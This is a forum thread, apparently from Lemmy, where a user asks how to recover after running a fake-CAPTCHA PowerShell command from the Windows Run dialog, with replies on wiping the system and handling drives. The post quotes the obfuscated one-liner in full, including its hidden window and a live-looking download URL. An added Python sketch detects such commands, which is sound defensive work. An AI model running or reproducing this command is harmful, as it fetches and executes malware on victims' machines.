I accidentally executed

POwErsHeLL -w 1 & \W*\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\S*2\\\\\\\\\\\m*ht*e https://mnjk-jk.bsdfg-zmp-q-n.shop/1.mp4 # ✅ ''Ι am nοt a rοbοt: Clοudflare Verificatiοn ΙD: 715921''

via Windows Run a couple of days ago. Realized what I had done today after seeing a post on it.

What should I do? Is a full system wipe necessary, or can I remove it somehow?

If I need to do a system format, what about attached drives and other devices on the network?
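As an added example (not part of the original post), the Python sketch below flags the traits visible in the pasted command: oddly cased `powershell`, a `-w 1` window-style argument, a wildcarded backslash path, a remote URL, and a trailing "verification" comment written with look-alike letters. The function name, indicator names and sample string are assumptions constructed for illustration; the sample uses a placeholder domain.

```python
import re
import unicodedata

# Casings a person or a normal script would plausibly type.
USUAL_CASINGS = {"powershell", "PowerShell", "Powershell", "POWERSHELL"}

def clickfix_indicators(cmd: str) -> list[str]:
    """Return the names of the heuristics a Run-dialog command line trips."""
    hits = []
    m = re.search(r"powershell(?:\.exe)?", cmd, re.IGNORECASE)
    if m and m.group(0).split(".")[0] not in USUAL_CASINGS:
        hits.append("random_casing")
    # -WindowStyle abbreviated to -w...; 1 is the numeric value of Hidden.
    if re.search(r"\s-w(?:i[a-z]*)?\s+(?:1|hidden)\b", cmd, re.IGNORECASE):
        hits.append("hidden_window")
    # Wildcards inside a backslash path, so the binary name never appears literally.
    if re.search(r"\\\S*\*", cmd):
        hits.append("wildcard_path")
    if re.search(r"https?://", cmd, re.IGNORECASE):
        hits.append("remote_url")
    # Trailing "# ..." decoy comment spelled with Greek/Cyrillic look-alikes.
    _, sep, comment = cmd.partition("#")
    if sep and any(unicodedata.name(c, "").startswith(("GREEK", "CYRILLIC"))
                   for c in comment):
        hits.append("homoglyph_comment")
    return hits

# Constructed sample modelled on the command in the post (placeholder domain,
# Greek omicron written as \u03bf so the look-alike letter is explicit).
SAMPLE = ("pOwERshEll -w 1 & \\W*\\S*2\\m*ht*e https://example.invalid/1.mp4 "
          "# I am n\u03bft a r\u03bfb\u03bft: Verificati\u03bfn ID: 000000")
BENIGN = "powershell -NoProfile -File C:\\scripts\\backup.ps1"

if __name__ == "__main__":
    for line in (SAMPLE, BENIGN):
        print(clickfix_indicators(line), "<-", line[:40])
```

Commands typed into the Run dialog are recorded per user under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, so exported values from that key are a natural input for a check like this.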

  • U got a virus. Anything from a crypto miner to a password/credit card stealer.

    Turn off the affected computer, pull out the drive, and plug it into a separate computer as a secondary drive. Pull the data u need off the drive and make a backup. Then wipe the old system, full reset (update BIOS if ur really paranoid). Then copy over ur backed up data. Do not copy any executable file from the infected drive.

    Go change ALL ur passwords that u ever saved on that computer. And watch ur bank statements like a hawk.

    • LazerFX@sh.itjust.works · 1 month ago

      Don’t do this - plugging in an infected drive can infect the secondary computer; you may wish to plug it into a Linux or other hardened system to get the data, however. The post by @silverdiamond is a better response.

        • LazerFX@sh.itjust.works · 22 days ago

          Late response, sorry - but I don’t see why not? I mean… this is part of the standard plug-in module system available in most malware creation tool-kits, so it should be assumed that USB drives of unknown provenance will either 1) contain malware as part of the USB auto-run (now not used very often, but can infect older computers), or 2) part of the USB firmware just as standard operating procedure.